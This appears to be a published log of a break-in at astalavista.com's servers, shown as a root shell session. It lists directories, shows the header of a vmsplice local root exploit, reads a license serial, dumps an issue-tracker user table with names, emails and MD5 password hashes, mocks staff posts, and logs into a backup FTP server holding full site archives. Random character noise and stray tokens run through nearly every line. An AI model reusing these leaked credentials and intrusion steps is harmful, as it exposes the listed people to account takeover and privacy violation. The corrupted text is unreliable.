+ ]# S! X. ]8 ?7 r# O( H* H4 Kdrwx—— 2 com com 4096 Jun 4 04:04 backups/ N% s0 K5 q8 S: M
-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
% f3 Z; d# P% c$ p' I" t! mdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system
- K/ b& u2 P' F+ ?* t# e# Z5 y. Z-rw——- 1 com com 21880 Jun 2 08:07 .bash_history
, q8 b$ S" t o& U3 ?0 q-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout7 z4 w( ?+ j/ I
-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile0 U) [! i/ e% V# }9 P+ Z; v
-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc
8 K: D9 W: d! h, B$ d( @) Q8 P0 hdrwx–x–x 3 com com 4096 Jan 29 2008 domains
3 w( L: | P- i; K-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed
+ J/ n7 \. ^% `5 sdrwxrwx— 3 com mail 4096 Jan 6 19:24 imap# ^( J$ z2 p) T6 h
-rw——- 1 com com 69 Nov 18 2008 .lesshst7 s- e1 |& m$ _0 X2 `5 t( P& R) s
drwx—— 2 com com 4096 Sep 24 2007 mail' O: ^ N# ]- D
-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history7 C7 o/ A/ E7 |! }' g
drwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp1 B" g b( [# T+ o3 k5 f
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html9 X, S' h w3 H, A* P# f
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow. E. x O9 C" D9 q3 O1 V; ]
drwx—— 2 com com 4096 Aug 26 2008 .ssh
8 k6 P) K8 {& V+ G-rwx—— 1 com com 8515 Feb 10 2008 t
2 E, X) F, u' b-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c. }% j1 B1 z {; |
drwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp
$ f: C; s1 c$ a2 J! v-rw-rw-r– 1 com com 617 May 20 2008 .toprc% X- ]; K8 T. m( w% z" W% A
-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql
. i9 @! t; F' u, h7 f-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
2 X8 W* j3 L( J% n( I4 g5 x$ T q-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc8 B* V3 o) P4 L+ _7 \
# B+ w3 @7 ]# C! V. fsh-3.2# head t.c
; h" O5 T3 x: q9 \" i/*1 X* d* x: n( e) K
* jessica_biel_naked_in_my_bed.c
4 }+ D( [- A* ]0 ^*' A, n3 R3 A. C3 @, K7 Y& x7 S) m
* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
# {. z; A& h, u5 L2 u* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca.& I; p% M. R. H2 u0 T% ]' ?& G
* Stejnak je to stare jak cyp a aj jakesyk rozbite.7 K$ }) E6 t7 i: X; Z$ ~$ M
*
" t. ~& K* Y" x* Linux vmsplice Local Root Exploit5 S( p7 m3 I$ X! l- l- o
* By qaaz
' l) h% P% ?% p7 @6 N2 @+ M9 Q*( r1 v+ b" n2 S0 Y; c7 }6 n# f7 Z; V5 o4 s
0 a3 R0 v; O5 |$ f$ csh-3.2# cd /
7 h0 @1 D3 @9 Q/ h$ O; w8 v! qsh-3.2# ls -la
1 g1 f( \0 U/ s# V m3 i* a6 Vtotal 360& a# a4 ?$ r, z
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .: D" Y2 h+ f0 w" t
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .., V; [1 b4 Y+ r( v' e: U
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
0 l2 T7 U) q) m8 r-rw——- 1 root root 10240 Jun 3 02:39 aquota.user% t @6 i: r' L7 g% ]( W
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db7 X" d: X* a+ ]0 x
-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck: V* A, A& e* Z9 [+ ?0 W0 S; A
-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel9 N+ d5 i4 F$ \) ^& U
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup0 E# `5 n8 e4 ~2 V
drwxr-xr-x 2 root root 4096 Jun 4 04:03 bin
8 W" t& t" E/ D, K# D# u) kdrwxr-xr-x 5 root root 4096 Jun 2 14:06 boot
9 t4 P$ j( _1 H, d" X( ydrwxr-xr-x 11 root root 3620 Jun 3 02:43 dev5 m! \1 j, M! ~6 T
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc* ~' c, A( p0 q Q: s
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home+ d0 A8 o/ R' s1 w0 c7 A
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf
( P1 U) G0 }& r) Ddrwxr-xr-x 11 root root 4096 Jun 4 04:02 lib8 y* j( }+ Q9 M( c, G
drwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64: A$ q8 V# O! Q; X
drwx—— 2 root root 16384 Sep 11 2007 lost+found
- }; H. r1 |3 a0 qdrwxr-xr-x 2 root root 4096 Mar 11 17:56 media
8 P2 w( i# b/ `" p& y0 ldrwxr-xr-x 2 root root 0 Jun 3 02:43 misc( J) U# B1 q8 U1 ^
drwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
1 S) X( E/ t, v. h' S5 n! D-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
4 M* B' S9 s, \8 ~$ @( xdrwxr-xr-x 2 root root 0 Jun 3 02:43 net/ A; R: z+ a0 ]: E
drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
) P: y# t+ h$ f2 z2 sdr-xr-xr-x 264 root root 0 Jun 3 02:42 proc' A V8 \' S5 b& {& W2 {0 I
drwxr-x— 15 root root 4096 Jun 4 08:40 root
# E# K- z+ S5 sdrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin
/ A6 F/ E; w- k: F* {drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
" a7 W: g" I4 c' s2 ]; }5 y! A6 o ldrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv
: V" E' \$ B; kdrwxr-xr-x 11 root root 0 Jun 3 02:42 sys, T/ K$ v: _2 v- v
drwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp
: _# a8 K( ^- d: ydrwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
1 g5 Z+ t( H) o" \# ^3 i4 ~drwxr-xr-x 26 root root 4096 Jun 4 03:16 var1 p1 h" f+ N+ _3 l; m8 J }
& G+ J/ n! G/ q& k) ^+ \
sh-3.2# cd opt# z9 h3 m; u" p6 M" R
sh-3.2# ls -la
, v" Y! f# t6 U5 P; U0 O. ~total 208 A( X# j5 d- x: ^5 G/ Z# R# D
drwxr-xr-x 3 root root 4096 Mar 11 17:56 .! S8 ?/ n3 [; e3 S
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
, j2 _( T+ g# L/ G }! v* Y& O$ Hdrwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
# k+ ~* _2 E- M0 ]
. a S" Q. N/ @% ^- Y8 bsh-3.2# cd lsws/
/ b' T- B. n8 A) ~4 ~sh-3.2# ls -la
+ n7 d, O- ]8 w9 Gtotal 108% F0 w @& U# }9 n5 q9 ]
drwxr-xr-x 15 root root 4096 Mar 20 2008 ." H0 |5 I4 q2 `
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
v3 P/ t" k' u, v8 ?) Wdrwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
; M% l$ W- _& ~) Z! `drwxr-xr-x 13 root root 4096 May 29 15:10 admin$ h0 J& ^3 S/ @/ k
drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate0 X; \: U$ J+ c4 L& S* c7 T( Z
drwxr-xr-x 2 root root 4096 May 29 15:10 bin& T. O) b1 _! e: K- Q
drwx—— 4 apache apache 4096 Jun 3 02:43 conf6 ^) _! a+ ~3 V4 a$ |% T
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT
4 _5 n3 e3 f- G: H/ D/ gdrwxr-xr-x 2 root root 4096 Sep 15 2008 docs
- s+ \' [# ~% a( s, edrwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin. R1 ]9 t2 N, B! g g
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib3 K( ?4 ^! Q& G' x! i4 g& o5 x
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE5 ^; \+ S" k! h, o$ {8 `
-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP/ y7 x) K- S o8 d7 ^
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL/ T( J- m9 ]' q' `; X3 Y# l) A
-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP% t% z9 Q+ i8 Z
drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs! Y' z n5 M3 A4 s0 Y
drwxr-xr-x 2 root root 4096 Mar 20 2008 php! X R5 L, _5 V" X
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
" J4 N. s( M+ n. j, t; rdrwxr-xr-x 3 root root 4096 Mar 20 2008 share. L. H+ s; C' G& F* g4 J
-rw-r–r– 1 root root 6 May 29 15:10 VERSION9 v, ^1 [0 h9 ]0 k( O; J3 ]( L
) @3 U+ l+ n+ D. j4 Z& n" a8 ?sh-3.2# cd conf
# ~% [0 F/ |6 \% T0 d Y! _sh-3.2# ls -la
6 \1 x( ?3 ~" `/ ntotal 48 ]4 f# q+ g0 _: J( I9 y. A
drwx—— 4 apache apache 4096 Jun 3 02:43 .
: F8 O6 c3 t$ F% O" P% idrwxr-xr-x 15 root root 4096 Mar 20 2008 ... ^1 l. g$ E6 W* x7 e2 e0 a
drwx—— 2 apache apache 4096 Mar 20 2008 cert
8 N# `" L: {' K& J" c-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml
4 E* A! Y3 v- R3 W3 |-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak$ a; x( y; Z2 X* ^$ ^
-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
1 W, w$ L- G9 S. a-rw——- 1 apache apache 256 May 29 15:10 license.key, R6 R/ T# F' N) S6 m7 p
-rw——- 1 apache apache 256 Mar 21 2008 license.key.old# }3 ]- C9 L) b! P0 q/ u
-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties" E, i6 D F6 @) f, _6 K$ W
-rw——- 1 apache apache 20 May 29 15:10 serial.no( F& ~' G- |$ q( d* Y6 t4 W
drwx—— 2 apache apache 4096 Mar 20 2008 templates
& g* _/ u$ X N4 c- F! h) L6 u4 j. H# z8 N" u9 y+ }5 ]
sh-3.2# cat serial.no6 G) T; r4 b( A; a5 D) h
IbDl-oVsO-CKqL-wVRa$ E0 Y! ]) M/ b- F: Z: _* U
0 q! }% O. d# M6 o' g0 {6 R1 e8 H i7 n
sh-3.2# mysql: r K V4 b; \( o: C
Welcome to the MySQL monitor. Commands end with ; or \g.
/ S% s3 D+ a% DYour MySQL connection id is 286844( O0 m& I; P7 O! b4 `/ H
Server version: 5.0.45-community-log MySQL Community Edition (GPL)1 u- @% q6 B7 Y# G/ M- o& z
9 D7 F6 B. P; S1 M4 \$ r9 HType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
! L8 L0 B) w" ^7 _+ C* Q j
* i1 w7 m* |. Umysql> show databases;0 c9 B, k# h% `" P7 U; S
+———————–+ M4 i8 \; v1 B# O# A, H
| Database |# E! i* P( q( c
+———————–+
" G A0 V3 g; i2 _| information_schema |
- Y5 U( C% G$ O! T| astanet_ads |% \! U2 |1 M1 k, h
| astanet_mailing_lists |# k+ k- T! Z2 c3 T7 a
| astanet_mediawiki |
% w6 K+ |8 P; q6 s+ M| astanet_membersystem |4 q7 F8 E0 ?' u
| com_contrexx |
1 h: v* \+ J0 X. _4 C| com_contrexx2 |3 W F7 o- l% p+ \4 Y9 ^# Q1 g
| com_contrexx2_live |
3 _% u& a+ K1 c9 Z; Y" b2 x| da_roundcube |$ N1 d4 Y0 H- V6 k2 c& z- d- T
| dolphin |
0 U8 {1 D; Q* U) K2 A4 K/ g| ideapool |
8 u0 ?7 ]8 ]9 K; n8 e: T Y| mysql |
! S7 T9 U) G" P# i2 M9 t| test |
% E* y$ ]7 @) n8 f9 T| yourmaster |
3 |* E( J! ]- z/ y+———————–+
" J: r j3 p" z8 o8 c# ]& I! j14 rows in set (0.00 sec)
/ U. D I( k0 h" f6 G
- f2 u ^& T6 l, L+ f& j7 Q y& X, rmysql> use ideapool
$ M/ T1 O7 g& S; R# fDatabase changed, ?4 F, h" ]1 G* e5 t8 i
mysql> show tables;/ C6 L6 x. A8 B# V6 }& U5 k! x a3 D6 h
+———————————–+( q, [& a4 k8 Z; N# q
| Tables_in_ideapool |
, {# H+ w" a$ N+ G+———————————–+
0 h: a1 a5 D M! P4 g| eventum_columns_to_display |
* J# G) O0 Z/ @; k- Q| eventum_custom_field |& h1 E# w& e* i$ d0 h# z
| eventum_custom_field_option |
: e) Z" C7 M4 E( U9 j$ X- h) V( |! q| eventum_custom_filter |9 I6 d6 t+ B5 ?( U) z7 A
| eventum_customer_account_manager |
. u1 c0 G4 n: p$ M& j8 f| eventum_customer_note |
5 V2 [$ y, `# _6 F/ L| eventum_email_account |8 q9 ^# K0 z0 I7 n
| eventum_email_draft |
) L& U; y) T) _ N9 S' f| eventum_email_draft_recipient |
7 v4 {: |6 x. d3 P5 o| eventum_email_response |9 d M! h# w0 f' }; d+ H1 u0 d0 O
| eventum_faq |
2 ~/ T3 j% n: \/ A- ]1 g3 c/ b| eventum_faq_support_level |1 J) E+ s) V6 }
| eventum_group |
9 z% q% o" K) ]. T1 A0 r| eventum_history_type |
) x9 p2 q! \; m| eventum_irc_notice |3 i- q- h2 M1 h2 s- R- { s& I
| eventum_issue |
! x+ Y& x$ ~3 b| eventum_issue_association |* L, z( c$ s- X9 G
| eventum_issue_attachment |
' g( `. A+ w* z5 [/ w| eventum_issue_attachment_file |
2 x" L' a V4 b3 v3 z+ b6 A| eventum_issue_checkin |
6 z u: V4 r% r| eventum_issue_custom_field |/ F: H" B- {% I) a1 U0 r, h/ C# S
| eventum_issue_history |
9 h4 D8 W! f, h' A7 P$ v; `| eventum_issue_quarantine |% i8 p/ U6 }7 h* s
| eventum_issue_requirement |
0 ]) x% p. U* U| eventum_issue_user |
& I+ O3 ?3 k2 Q" @| eventum_issue_user_replier |
4 l4 |' H9 |' }* ^- ?$ D| eventum_link_filter |
% x5 g j# F' l( F+ v1 `4 `9 s. Y| eventum_mail_queue |
! q5 b' P% w y( V& {0 w$ [| eventum_mail_queue_log |
$ e, n# ^+ C& v6 i/ g2 N3 L1 B! T| eventum_news |1 m0 Q/ ]6 ` o# |) U; e
| eventum_note |
6 e, B8 x$ G* u$ z6 m; J| eventum_phone_support |
+ G5 b) Q7 y, s. w: h| eventum_project |; b' f, o: T: V9 ?* f- s
| eventum_project_category |
1 Q& f$ a$ e( d4 p| eventum_project_custom_field |
* b0 a" p o; _) E( S3 y* Z| eventum_project_email_response |
* n8 t& O4 v+ l- f| eventum_project_field_display |; V6 n3 h( d5 o; k& v% N
| eventum_project_group |
9 r2 X& V0 \) N( U| eventum_project_link_filter |
- J: v) o' q, \. F& k| eventum_project_news |" N6 F6 |3 z7 R. S1 q( X
| eventum_project_phone_category |
' }" q9 A) l% p& r| eventum_project_priority |
: t h r! S$ X. I# O+ `9 U7 e| eventum_project_release |
& l. o3 n9 E5 H U4 j; |% r. K| eventum_project_round_robin |
2 g4 g% o$ M# ~| eventum_project_status |1 O y$ |+ f5 E5 j+ F9 }
| eventum_project_status_date |
3 H/ X, O9 J) |7 A7 Q+ d3 P| eventum_project_user |3 ]# \" @+ ]- b; L
| eventum_reminder_action |
E2 j% ?$ N1 B& K( m| eventum_reminder_action_list |% R+ Q2 A5 ]+ d; Y8 v
| eventum_reminder_action_type |3 Y! O6 u2 u+ N1 f
| eventum_reminder_field |
4 ]/ L9 h4 J4 O" G$ K2 ^" M| eventum_reminder_history |1 x6 J; N! h( c1 e1 o9 i
| eventum_reminder_level |
6 P- d4 s0 j; g' S3 L$ P2 W9 A| eventum_reminder_level_condition |6 O4 g" j7 K- b/ Y# @2 M/ y
| eventum_reminder_operator | O) \+ u; d% V- H+ \/ k) Q
| eventum_reminder_priority |4 \; H9 h: m& F$ _8 L; V3 q, f9 u
| eventum_reminder_requirement |
; a& n1 ~( j* T2 e8 @/ Q| eventum_reminder_triggered_action |" A2 ?) |$ L/ j* D/ _, f) s
| eventum_resolution |
1 t5 T" h& g, v% I5 h+ k7 P) x| eventum_round_robin_user |
9 W6 D' b$ \+ |9 G- O' g7 ~3 S| eventum_search_profile |
) @' W/ }" C$ T' C- \" h0 o| eventum_status |
. q" }1 u) @2 j& D. e| eventum_subscription |
1 ?. B" _- X" |7 M| eventum_subscription_type |. x. d8 M& I2 ?: K
| eventum_support_email |
/ q9 |( ]: p, m4 w# D| eventum_support_email_body |" T/ B7 n, f8 k
| eventum_time_tracking |, U7 U: V. Y0 K9 a
| eventum_time_tracking_category |
1 d$ G1 ~4 ]1 c( a: X ]3 {0 z| eventum_user |* Z0 U* [: p; f( h( C& G
+———————————–+0 W: x5 A2 a- v, u K: Y7 \6 X
69 rows in set (0.00 sec)* N! @: ^5 j% ~
1 w, {! S5 Q+ M9 G1 xmysql> describe eventum_user;
# h$ U) Z) z) C* M+ K( ^+————————-+——————+——+—–+———————+—————-+8 j% v- O* W0 y. w1 `
| Field | Type | Null | Key | Default | Extra |. r7 _. H7 u. a3 }& I
+————————-+——————+——+—–+———————+—————-+% I" r5 a6 \- V- r q, j
| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |
, H7 v4 C. P0 J5 h& L/ y| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |2 ^1 d0 e+ \8 E$ V" c1 i5 E
| usr_customer_id | int(11) unsigned | YES | | NULL | |
0 t5 S8 Y" G* ~. ?; D: Y6 o7 g( o| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |
& a9 V; o; w4 v8 ?/ {| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
4 ^ q4 m" T8 }4 j6 q| usr_status | varchar(8) | NO | | active | |( f" L6 r; O& U2 v% u' I
| usr_password | varchar(32) | NO | | | |# ^( r5 M# V5 x; V) x
| usr_full_name | varchar(255) | NO | | | |
: p1 c! F* `: S0 E% s5 I' r| usr_email | varchar(255) | NO | UNI | | |
( O5 J0 d. [1 u: _7 B8 X* [| usr_preferences | longtext | YES | | NULL | |7 \" F/ @4 W) K/ {4 k: w. @
| usr_sms_email | varchar(255) | YES | | NULL | |/ v! o0 a; Z1 r/ t; y6 m8 @
| usr_clocked_in | tinyint(1) | YES | | 0 | |2 S& m, Z" v% y. B% N7 q _; y7 H l
| usr_lang | varchar(5) | YES | | NULL | |
, _- Z7 d+ Z9 L! z+————————-+——————+——+—–+———————+—————-+
q5 U& N" w5 O- v9 h" I3 }* U9 i5 a13 rows in set (0.00 sec)9 S x$ S% r( X8 T) Y7 M( h
: t* v' }5 q% K K8 C4 I& vmysql> select usr_full_name,usr_email,usr_password from eventum_user;" }: T; F+ \' p$ ?
+———————-+——————————-+———————————-+ s, |" O! ~1 k8 N# j9 {. x& N+ [6 l* _
| usr_full_name | usr_email | usr_password |. n$ ~+ o7 P" N- }
+———————-+——————————-+———————————-+0 D( F, g8 S; V$ @& t
| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |
b% k2 S' U; x- t| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
% n: s, A# y* p' n8 `/ m {| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |9 T. z+ R; {: p' g( x& O t
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |5 F- k. f7 @' k `" `1 l
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |* v" ~) s" Z& L
| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |: S& D# D4 |4 B
| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |
% _; m9 a- j. ]. K5 G: T0 K| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
) r& H8 e* Z3 O) H6 N& h| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |4 [1 J0 w& N$ R7 h! E
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |! ?; P; t1 U- o' L( a! T5 j9 t
| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
" n$ A' ?8 x3 }* q7 D4 @| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |" ^% X& `/ b/ e
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
5 v; {1 e' P, a| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |+ f9 W( ]0 D+ p3 }/ j
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
0 y% S Z" E7 w8 \' `, b: a6 Q: n+———————-+——————————-+———————————-+1 O+ D/ u" I8 ?8 q2 X* S
15 rows in set (0.00 sec)
/ _1 r9 N$ E( ]* b9 u9 T
& Q7 p& U" g# w, l& pmysql> select iss_description from eventum_issue where iss_id = 43;7 U3 J4 A* f+ d3 Y
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+! B/ F# u, L5 e* R! p7 `9 e8 {6 ?
| iss_description
% @# q: ]: G' C* t# a|
4 M6 V) u- K8 ?, n+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+4 N" y& f$ h& Q+ `: y% w
| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be9 J0 W7 V. P% N7 W y
connected for 90 mins… 120mins… so what i propose is something like:
- J* i) P9 J& u" [/ F, V" x2 ?链接标记[url]http://www.surfthechannel.com/[/url]* S( R. v) z1 f9 g
since they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system$ o, p0 h( K4 y
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
4 W0 D I5 ~+ k3 y, B u7 n/ gbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
2 d! C+ p) A2 W& q0 wif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
$ y" k( D% m% F" R6 p* l p, l4 D4 M0 s2 C9 A* F$ G
We could also put advertisement during play on the flash video player itself… extra $$…
9 f* p8 H8 y+ t( z/ U9 D
6 `9 B$ f9 h" h. a. mBy sykadul |& ~% r1 e3 g% t3 y9 @, t
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
" `2 ^9 S4 n$ |: X, Z% c# a# \% D1 row in set (0.00 sec)
/ N8 C% m. R3 D/ U! _
3 A% w; k6 b. s, n1 M// Money and extra $$ is all they care about. remember that.( E i$ G: _9 u/ S! V
, l3 V& ~' b+ S3 g! R jmysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
/ l9 D# }: j3 x5 ]+————————+——————————————————————————————————————————————————————————————————————————————-+
7 }. F2 ]9 D0 \) S| iss_summary | iss_description ! K( I4 ^! T# {' x5 v( U
|
/ o \* s. ^/ x- B! \6 m4 `+————————+——————————————————————————————————————————————————————————————————————————————-+/ c% y2 {2 U- O
| Forum for REAL EXPERTS | Hello,1 A3 O% r$ S( z7 x- m
% c. @+ \, J7 f. u" @' F, u6 @# \Ishtus and I,2 i! [9 U; z7 d
" I$ ?( h( _: g `) d8 b
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide
! W4 j6 A v/ b. |7 L' F" ~) aONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
% |" ?3 \ \& a5 c& L( h3 S
8 H) W" G5 S3 _1 m3 L5 gOne example a friend of mine from coresecurity.com!7 M+ n2 B6 ^% A, e! l
4 E) M/ S/ P- i. F& M8 ^8 W# aWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..0 M$ W# l( ~# U# j! d
# {( \* n: m+ T1 L
|
, [, g9 i8 x6 {, [! O! T) J" A) ~+————————+——————————————————————————————————————————————————————————————————————————————+
- p# R5 W- V/ h1 row in set (0.00 sec)* U I6 ]- L* T( t
! \) m- Z4 q i
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…$ a/ `1 j# F. Z& z) e% a2 k
% |3 Q, f! @' A4 ^
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;) ]4 ]( {3 F7 b" n% ]
+——————+———————————————————————————————+
+ _, ?* Y. l7 N( K7 N| iss_summary | iss_description |
+ \/ r- P( X; i" l8 I/ v+——————+———————————————————————————————+
0 E: n( N6 H" m| Website guidance | Virtual Girl which guides you trought the website.; a7 o/ ^2 x! K# S) j% @
! y3 y+ a! c3 B9 S% _5 p5 \We need a girl with who you can ( talk )!!!+ f" A' W: H0 g' s
Also for the News!. [6 s4 S9 }- O9 I1 ^/ ^5 W z
So my suggestion is a girl who read you the news loud if you like!
+ K, _- ?3 v8 c. z' Y, Dyou can choose between read yourselfe or she read it for you or both!
; o1 s/ T% a9 P$ G. A+ m/ U2 {2 ^0 u1 _# I- n
Go to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
" {' y$ T3 u' e. q; x+ Q/ T+ m- [! G% W5 \
Have a look on the example girls!!
+ x0 i5 \, H; P6 K2 R
8 [7 G0 q9 {" s, b" c链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
. O/ j, Q- I2 j$ i' U3 V% r* Q4 ~
or that
) [5 O: ~3 s" H' L4 b4 o, Q
* \3 q: m5 Q8 @# m+ u% C1 ^链接标记[url]http://www.yellostrom.de/[/url]/ @+ L1 d2 V! i8 p8 X, U2 d
% G2 E. D7 W: S6 j
|. o+ C2 p) s7 P. U
+——————+———————————————————————————————+
+ B _. d/ Y% n( m) v' z; a7 ^1 row in set (0.00 sec)
* A1 G3 t0 `5 S4 d( ?/ H0 {% H4 i
6 N6 q$ p! {# C6 j// ha ha.
3 n. A% u+ v/ b: U8 @7 {2 a* o+ j# n" M, L
mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;% f4 d. N; `" `+ _/ Q
+————————–+———————————————————————————————————–+: e( @1 J& R3 @8 W6 _0 k
| iss_summary | iss_description |
3 S6 ^/ w5 D. S* }* S, P+————————–+———————————————————————————————————–+
* t. Q: [3 O7 i" l" C: B2 G| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |
# }6 f$ y& b' y* ?* H6 D+————————–+———————————————————————————————————–+! e( r: @ @# g9 i& B* t8 y
1 row in set (0.00 sec)
: S& n# Z4 S: M3 f2 m7 v
, `( P9 |0 c- Z$ m/ Z; E @// LOL.
$ U+ Q" V @9 z' Y, j$ S) }3 ]2 l7 F) X) X, H) L* H4 \
mysql> exit$ s. @: [! n' @$ {
Bye; x0 q8 P5 R1 K& `0 R
. U% c- t# [* n* z
sh-3.2# ftp 212.254.194.163
3 h$ P; H4 }% X$ J" g& A0 OConnected to 212.254.194.163.% X y- k$ Y( x
220 BackupCOM_VW FTP server ready.
( i: {" h6 I2 P- l3 G' Q# D504 AUTH: security mechanism ‘GSSAPI’ not supported.
( ^5 r7 [$ f* J" O; b4 U504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.* @, F7 \0 r; b2 K: @, L
KERBEROS_V4 rejected as an authentication type
2 ?7 D3 w& p; v5 ^; V$ ~# ]$ A( VName (212.254.194.163:root): astalavista.com
( l5 ? C; u h" Q331 Password required for astalavista.com.4 @- d9 ?! p3 c& n
Password:+ m3 @, Z4 Z: b) F( K2 p. h
230 User astalavista.com logged in.( S1 M) e5 ]! U9 ? q `
Remote system type is UNIX.
9 ]; Y9 X9 t; Y! J" u9 x* G1 uUsing binary mode to transfer files.2 T9 b$ s. j @% H. }: X5 h0 u
ftp> ls -la! ?6 D( S' A( f4 y# t1 _2 j s
227 Entering Passive Mode (212,254,194,163,2,188)
3 v" g$ C+ c$ w! R) h* c" Q% z150 Opening BINARY mode data connection for ‘file list’.( n3 L- w q/ ^. `. q
dr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com! s! o8 C* a/ \/ n
226 Transfer complete.
. F1 K( f8 ?3 `ftp> cd astalavista.com
* i: I5 j+ f% @% Z2 Z250 CWD command successful.
* Q: T/ u. G6 bftp> ls -la" T1 z% ^) M+ w; E0 U, Y V v; [
227 Entering Passive Mode (212,254,194,163,2,189)
9 {/ ]' ^, E' A1 U c150 Opening BINARY mode data connection for ‘file list’.; \- z% j% _1 ?. i0 P5 S
-rw-rw-rw- 1 astalavista.com users 23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
- l4 \$ m: V' ]9 z0 l' z6 u+ G-rw-rw-rw- 1 astalavista.com users 20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2, j. W. k! f E) x" j
